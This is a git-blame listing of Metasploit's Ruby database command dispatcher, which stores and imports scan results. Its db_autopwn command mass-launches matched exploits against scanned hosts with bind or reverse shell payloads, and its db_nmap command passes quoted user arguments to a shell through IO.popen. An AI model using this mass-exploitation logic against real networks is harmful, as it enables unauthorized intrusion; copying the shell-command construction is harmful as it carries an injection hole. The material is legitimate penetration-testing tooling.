2006-05-30 15:44:48 +00:00
|
|
|
module Msf
|
|
|
|
module Ui
|
|
|
|
module Console
|
|
|
|
module CommandDispatcher
|
|
|
|
module Db
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
require 'rexml/document'
|
|
|
|
require 'tempfile'
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constants
|
|
|
|
#
|
|
|
|
|
2006-12-10 08:21:52 +00:00
|
|
|
PWN_SHOW = 2**0
|
|
|
|
PWN_XREF = 2**1
|
|
|
|
PWN_PORT = 2**2
|
|
|
|
PWN_EXPL = 2**3
|
|
|
|
PWN_SING = 2**4
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
#
|
|
|
|
# The dispatcher's name.
|
|
|
|
#
|
|
|
|
def name
|
|
|
|
"Database Backend"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the hash of commands supported by this dispatcher.
|
|
|
|
#
|
|
|
|
def commands
|
|
|
|
{
|
|
|
|
"db_hosts" => "List all hosts in the database",
|
|
|
|
"db_services" => "List all services in the database",
|
|
|
|
"db_vulns" => "List all vulnerabilities in the database",
|
2008-03-02 04:46:13 +00:00
|
|
|
"db_notes" => "List all notes in the database",
|
2006-05-30 15:44:48 +00:00
|
|
|
"db_add_host" => "Add one or more hosts to the database",
|
|
|
|
"db_add_port" => "Add a port to host",
|
2008-03-02 04:46:13 +00:00
|
|
|
"db_add_note" => "Add a note to host",
|
2006-09-16 20:08:13 +00:00
|
|
|
"db_autopwn" => "Automatically exploit everything",
|
2006-05-30 15:44:48 +00:00
|
|
|
"db_import_nessus_nbe" => "Import a Nessus scan result file (NBE)",
|
2006-09-17 22:07:52 +00:00
|
|
|
"db_import_nmap_xml" => "Import a Nmap scan results file (-oX)",
|
|
|
|
"db_nmap" => "Executes nmap and records the output automatically",
|
2006-05-30 15:44:48 +00:00
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_hosts(*args)
|
|
|
|
framework.db.each_host do |host|
|
2008-07-22 07:28:05 +00:00
|
|
|
print_status("Time: #{host.created} Host: #{host.address} Status: #{host.state} OS: #{host.os_name} #{host.os_flavor}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_services(*args)
|
|
|
|
framework.db.each_service do |service|
|
2008-03-02 04:46:13 +00:00
|
|
|
print_status("Time: #{service.created}] Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state} name=#{service.name}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_vulns(*args)
|
|
|
|
framework.db.each_vuln do |vuln|
|
2006-09-16 20:08:13 +00:00
|
|
|
reflist = vuln.refs.map { |r| r.name }
|
2008-03-02 04:46:13 +00:00
|
|
|
print_status("Time: #{vuln.created} Vuln: host=#{vuln.host.address} port=#{vuln.service.port} proto=#{vuln.service.proto} name=#{vuln.name} refs=#{reflist.join(',')}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
2008-03-02 04:46:13 +00:00
|
|
|
|
|
|
|
def cmd_db_notes(*args)
|
|
|
|
framework.db.each_note do |note|
|
|
|
|
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
def cmd_db_add_host(*args)
|
|
|
|
print_status("Adding #{args.length.to_s} hosts...")
|
|
|
|
args.each do |address|
|
2008-03-02 04:46:13 +00:00
|
|
|
host = framework.db.get_host(nil, address)
|
|
|
|
print_status("Time: #{host.created} Host: host=#{service.host.address}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_db_add_port(*args)
|
|
|
|
if (not args or args.length < 3)
|
|
|
|
print_status("Usage: db_add_port [host] [port] [proto]")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
host = framework.db.get_host(nil, args[0])
|
|
|
|
return if not host
|
|
|
|
|
|
|
|
service = framework.db.get_service(nil, host, args[2].downcase, args[1].to_i)
|
|
|
|
return if not service
|
|
|
|
|
2008-03-02 04:46:13 +00:00
|
|
|
print_status("Time: #{service.created} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
|
2008-03-02 04:46:13 +00:00
|
|
|
def cmd_db_add_note(*args)
|
|
|
|
if (not args or args.length < 3)
|
|
|
|
print_status("Usage: db_add_note [host] [type] [note]")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
naddr = args.shift
|
|
|
|
ntype = args.shift
|
|
|
|
ndata = args.join(" ")
|
|
|
|
|
|
|
|
host = framework.db.get_host(nil, naddr)
|
|
|
|
return if not host
|
|
|
|
|
|
|
|
note = framework.db.get_note(nil, host, ntype, ndata)
|
|
|
|
return if not note
|
|
|
|
|
|
|
|
print_status("Time: #{note.created} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
|
|
|
|
end
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
#
|
|
|
|
# A shotgun approach to network-wide exploitation
|
|
|
|
#
|
|
|
|
def cmd_db_autopwn(*args)
|
|
|
|
|
|
|
|
stamp = Time.now.to_f
|
|
|
|
vcnt = 0
|
|
|
|
rcnt = 0
|
|
|
|
mode = 0
|
|
|
|
code = :bind
|
|
|
|
|
2006-12-10 08:21:52 +00:00
|
|
|
targ_inc = []
|
|
|
|
targ_exc = []
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
args.push("-h") if args.length == 0
|
|
|
|
|
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
|
|
|
when '-t'
|
|
|
|
mode |= PWN_SHOW
|
|
|
|
when '-x'
|
|
|
|
mode |= PWN_XREF
|
|
|
|
when '-p'
|
|
|
|
mode |= PWN_PORT
|
|
|
|
when '-e'
|
|
|
|
mode |= PWN_EXPL
|
|
|
|
when '-s'
|
|
|
|
mode |= PWN_SING
|
|
|
|
when '-r'
|
|
|
|
code = :conn
|
|
|
|
when '-b'
|
|
|
|
code = :bind
|
2006-12-10 08:21:52 +00:00
|
|
|
when '-I'
|
|
|
|
targ_inc << OptAddressRange.new('TEMPRANGE', [ true, '' ]).normalize(args.shift)
|
|
|
|
when '-X'
|
|
|
|
targ_exc << OptAddressRange.new('TEMPRANGE', [ true, '' ]).normalize(args.shift)
|
2006-09-17 22:07:52 +00:00
|
|
|
when '-h'
|
|
|
|
print_status("Usage: db_autopwn [options]")
|
2006-12-10 08:21:52 +00:00
|
|
|
print_line("\t-h Display this help text")
|
|
|
|
print_line("\t-t Show all matching exploit modules")
|
|
|
|
print_line("\t-x Select modules based on vulnerability references")
|
|
|
|
print_line("\t-p Select modules based on open ports")
|
|
|
|
print_line("\t-e Launch exploits against all matched targets")
|
|
|
|
print_line("\t-s Only obtain a single shell per target system (NON-FUNCTIONAL)")
|
|
|
|
print_line("\t-r Use a reverse connect shell")
|
|
|
|
print_line("\t-b Use a bind shell on a random port")
|
|
|
|
print_line("\t-I [range] Only exploit hosts inside this range")
|
|
|
|
print_line("\t-X [range] Always exclude hosts inside this range")
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
print_line("")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
matches = {}
|
|
|
|
|
|
|
|
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
|
|
|
|
# Scan all exploit modules for matching references
|
|
|
|
mtype[0].each_module do |n,m|
|
|
|
|
e = m.new
|
|
|
|
|
|
|
|
#
|
|
|
|
# Match based on vulnerability references
|
|
|
|
#
|
|
|
|
if (mode & PWN_XREF != 0)
|
|
|
|
e.references.each do |r|
|
|
|
|
rcnt += 1
|
|
|
|
|
|
|
|
ref_name = r.ctx_id + '-' + r.ctx_val
|
|
|
|
ref = framework.db.has_ref?(ref_name)
|
|
|
|
|
|
|
|
if (ref)
|
|
|
|
ref.vulns.each do |vuln|
|
|
|
|
vcnt += 1
|
|
|
|
serv = vuln.service
|
2007-02-16 19:14:55 +00:00
|
|
|
next if not serv.host
|
2006-09-17 22:07:52 +00:00
|
|
|
xport = serv.port
|
|
|
|
xprot = serv.proto
|
|
|
|
xhost = serv.host.address
|
2006-12-10 08:21:52 +00:00
|
|
|
next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
|
|
|
|
next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))
|
2006-09-17 22:07:52 +00:00
|
|
|
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Match based on ports alone
|
|
|
|
#
|
|
|
|
if (mode & PWN_PORT != 0)
|
|
|
|
rport = e.datastore['RPORT']
|
|
|
|
if (rport)
|
|
|
|
framework.db.services.each do |serv|
|
2007-02-16 19:14:55 +00:00
|
|
|
next if not serv.host
|
2006-09-17 22:07:52 +00:00
|
|
|
next if serv.port.to_i != rport.to_i
|
|
|
|
xport = serv.port
|
|
|
|
xprot = serv.proto
|
|
|
|
xhost = serv.host.address
|
2006-12-10 08:21:52 +00:00
|
|
|
next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
|
|
|
|
next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))
|
2006-09-17 22:07:52 +00:00
|
|
|
matches[[xport,xprot,xhost,mtype[1]+'/'+n]]=true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
if (mode & PWN_SHOW != 0)
|
|
|
|
print_status("Analysis completed in #{(Time.now.to_f - stamp).to_s} seconds (#{vcnt.to_s} vulns / #{rcnt.to_s} refs)")
|
|
|
|
end
|
|
|
|
|
|
|
|
idx = 0
|
|
|
|
matches.each_key do |xref|
|
|
|
|
idx += 1
|
|
|
|
|
|
|
|
begin
|
|
|
|
mod = nil
|
|
|
|
|
|
|
|
if ((mod = framework.modules.create(xref[3])) == nil)
|
|
|
|
print_status("Failed to initialize #{xref[3]}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
if (mode & PWN_SHOW != 0)
|
|
|
|
print_status("Matched #{xref[3]} against #{xref[2].to_s}:#{mod.datastore['RPORT'].to_s}...")
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# The code is just a proof-of-concept and will be expanded in the future
|
|
|
|
#
|
|
|
|
if (mode & PWN_EXPL != 0)
|
|
|
|
|
|
|
|
mod.datastore['RHOST'] = xref[2]
|
|
|
|
mod.datastore['RPORT'] = xref[0].to_s
|
|
|
|
|
|
|
|
if (code == :bind)
|
2007-12-31 05:01:10 +00:00
|
|
|
mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
|
2006-09-17 22:07:52 +00:00
|
|
|
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
|
|
|
|
end
|
|
|
|
|
|
|
|
if (code == :conn)
|
2007-12-31 05:01:10 +00:00
|
|
|
mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
|
2006-09-17 22:07:52 +00:00
|
|
|
mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2])
|
|
|
|
mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s
|
|
|
|
|
|
|
|
if (mod.datastore['LHOST'] == '127.0.0.1')
|
|
|
|
print_status("Failed to determine listener address for target #{xref[2]}...")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
next if not mod.autofilter()
|
|
|
|
|
|
|
|
print_status("Launching #{xref[3]} (#{idx.to_s}/#{matches.length.to_s}) against #{xref[2].to_s}:#{mod.datastore['RPORT'].to_s}...")
|
|
|
|
|
|
|
|
begin
|
|
|
|
case mod.type
|
|
|
|
when MODULE_EXPLOIT
|
|
|
|
session = mod.exploit_simple(
|
|
|
|
'Payload' => mod.datastore['PAYLOAD'],
|
|
|
|
'LocalInput' => driver.input,
|
|
|
|
'LocalOutput' => driver.output,
|
|
|
|
'RunAsJob' => true)
|
|
|
|
when MODULE_AUX
|
|
|
|
session = mod.run_simple(
|
|
|
|
'LocalInput' => driver.input,
|
|
|
|
'LocalOutput' => driver.output,
|
|
|
|
'RunAsJob' => true)
|
|
|
|
end
|
|
|
|
rescue ::Exception
|
|
|
|
print_status(" >> Exception during launch from #{xref[3]}: #{$!.to_s}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Exception
|
|
|
|
print_status(" >> Exception from #{xref[3]}: #{$!.to_s}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# EOM
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Import Nessus NBE files
|
|
|
|
#
|
2006-05-30 15:44:48 +00:00
|
|
|
def cmd_db_import_nessus_nbe(*args)
|
|
|
|
if (not (args and args.length == 1))
|
2006-09-16 06:45:06 +00:00
|
|
|
print_status("Usage: db_import_nessus_nbe [nessus.nbe]")
|
2006-05-30 15:44:48 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if (not File.readable?(args[0]))
|
|
|
|
print_status("Could not read the NBE file")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
fd = File.open(args[0], 'r')
|
|
|
|
fd.each_line do |line|
|
|
|
|
r = line.split('|')
|
|
|
|
next if r[0] != 'results'
|
|
|
|
addr = r[2]
|
|
|
|
nasl = r[4]
|
|
|
|
hole = r[5]
|
|
|
|
data = r[6]
|
2006-09-16 20:08:13 +00:00
|
|
|
refs = {}
|
2006-09-16 06:45:06 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
m = r[3].match(/^([^\(]+)\((\d+)\/([^\)]+)\)/)
|
|
|
|
next if not m
|
|
|
|
|
|
|
|
host = framework.db.get_host(nil, addr)
|
|
|
|
next if not host
|
|
|
|
|
|
|
|
service = framework.db.get_service(nil, host, m[3].downcase, m[2].to_i)
|
|
|
|
service.name = m[1]
|
|
|
|
service.save
|
|
|
|
|
2006-09-16 20:08:13 +00:00
|
|
|
next if not nasl
|
|
|
|
|
|
|
|
data.gsub!("\\n", "\n")
|
|
|
|
|
|
|
|
|
|
|
|
if (data =~ /^CVE : (.*)$/)
|
|
|
|
$1.gsub(/C(VE|AN)\-/, '').split(',').map { |r| r.strip }.each do |r|
|
|
|
|
refs[ 'CVE-' + r ] = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if (data =~ /^BID : (.*)$/)
|
|
|
|
$1.split(',').map { |r| r.strip }.each do |r|
|
|
|
|
refs[ 'BID-' + r ] = true
|
|
|
|
end
|
|
|
|
end
|
2006-09-17 00:39:23 +00:00
|
|
|
|
|
|
|
if (data =~ /^Other references : (.*)$/)
|
|
|
|
$1.split(',').map { |r| r.strip }.each do |r|
|
2006-09-17 07:17:27 +00:00
|
|
|
ref_id, ref_val = r.split(':')
|
|
|
|
ref_val ? refs[ ref_id + '-' + ref_val ] = true : refs[ ref_id ] = true
|
2006-09-17 00:39:23 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2006-09-16 20:08:13 +00:00
|
|
|
refs[ 'NSS-' + nasl.to_s ] = true
|
|
|
|
|
|
|
|
vuln = framework.db.get_vuln(nil, service, 'NSS-' + nasl.to_s, data)
|
|
|
|
|
|
|
|
rids = []
|
|
|
|
refs.keys.each do |r|
|
|
|
|
rids << framework.db.get_ref(nil, r)
|
|
|
|
end
|
|
|
|
|
|
|
|
vuln.refs << (rids - vuln.refs)
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
2006-09-16 20:08:13 +00:00
|
|
|
end
|
|
|
|
|
2006-09-17 00:39:23 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
#
|
|
|
|
# Import Nmap data from a file
|
|
|
|
#
|
|
|
|
def cmd_db_import_nmap_xml(*args)
|
|
|
|
if (not (args and args.length == 1))
|
|
|
|
print_status("Usage: db_import_nmap_xml [nmap.xml]")
|
|
|
|
return
|
|
|
|
end
|
2006-09-17 00:39:23 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
if (not File.readable?(args[0]))
|
|
|
|
print_status("Could not read the XML file")
|
|
|
|
return
|
2006-09-17 00:39:23 +00:00
|
|
|
end
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
fd = File.open(args[0], 'r')
|
|
|
|
data = fd.read
|
|
|
|
fd.close
|
|
|
|
|
|
|
|
load_nmap_xml(data)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Import Nmap data from a file
|
|
|
|
#
|
|
|
|
def cmd_db_nmap(*args)
|
|
|
|
if (args.length == 0)
|
|
|
|
print_status("Usage: db_nmap [nmap options]")
|
|
|
|
return
|
2006-09-16 20:08:13 +00:00
|
|
|
end
|
|
|
|
|
2007-12-31 04:05:51 +00:00
|
|
|
nmap =
|
|
|
|
Rex::FileUtils.find_full_path("nmap") ||
|
|
|
|
Rex::FileUtils.find_full_path("nmap.exe")
|
|
|
|
|
|
|
|
if(not nmap)
|
|
|
|
print_error("The nmap executable could not be found")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
fd = Tempfile.new('dbnmap')
|
2008-09-26 05:01:18 +00:00
|
|
|
|
2007-12-31 08:27:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
args.push('-oX', fd.path)
|
2007-12-31 04:05:51 +00:00
|
|
|
args.unshift(nmap)
|
2007-12-31 04:53:35 +00:00
|
|
|
|
2007-12-31 04:58:44 +00:00
|
|
|
cmd = args.map{|x| '"'+x+'"'}.join(" ")
|
2007-12-31 04:53:35 +00:00
|
|
|
|
|
|
|
print_status("exec: #{cmd}")
|
|
|
|
IO.popen( cmd ) do |io|
|
2007-12-31 04:05:51 +00:00
|
|
|
io.each_line do |line|
|
|
|
|
print_line("NMAP: " + line.strip)
|
|
|
|
end
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2007-12-31 08:27:24 +00:00
|
|
|
data = File.read(fd.path)
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2007-12-31 08:27:24 +00:00
|
|
|
File.unlink(fd.path)
|
2007-12-31 08:20:48 +00:00
|
|
|
|
2008-09-26 05:01:18 +00:00
|
|
|
fd.close
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
load_nmap_xml(data)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Process Nmap XML data
|
|
|
|
#
|
|
|
|
def load_nmap_xml(data)
|
|
|
|
doc = REXML::Document.new(data)
|
|
|
|
doc.elements.each('/nmaprun/host') do |host|
|
|
|
|
addr = host.elements['address'].attributes['addr']
|
|
|
|
host.elements['ports'].elements.each('port') do |port|
|
|
|
|
prot = port.attributes['protocol']
|
|
|
|
pnum = port.attributes['portid']
|
2006-09-21 14:51:58 +00:00
|
|
|
|
|
|
|
next if not port.elements['state']
|
2006-09-17 22:07:52 +00:00
|
|
|
stat = port.elements['state'].attributes['state']
|
2006-09-21 14:51:58 +00:00
|
|
|
|
2006-09-18 06:22:43 +00:00
|
|
|
next if not port.elements['service']
|
2006-09-17 22:07:52 +00:00
|
|
|
name = port.elements['service'].attributes['name']
|
|
|
|
prod = port.elements['service'].attributes['product']
|
|
|
|
xtra = port.elements['service'].attributes['extrainfo']
|
2006-09-17 00:39:23 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
next if stat != 'open'
|
2006-09-17 08:00:37 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
host = framework.db.get_host(nil, addr)
|
|
|
|
next if not host
|
|
|
|
|
|
|
|
service = framework.db.get_service(nil, host, prot.downcase, pnum.to_i)
|
|
|
|
service.name = name
|
|
|
|
service.save
|
|
|
|
end
|
2006-09-16 20:08:13 +00:00
|
|
|
end
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2006-12-10 08:21:52 +00:00
|
|
|
#
|
|
|
|
# Determine if an IP address is inside a given range
|
|
|
|
#
|
|
|
|
def range_include?(ranges, addr)
|
|
|
|
|
|
|
|
ranges.each do |sets|
|
|
|
|
sets.each do |set|
|
|
|
|
rng = set.split('-').map{ |c| Rex::Socket::addr_atoi(c) }
|
|
|
|
tst = Rex::Socket::addr_atoi(addr)
|
|
|
|
if (tst >= rng[0] and tst <= rng[1])
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
false
|
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|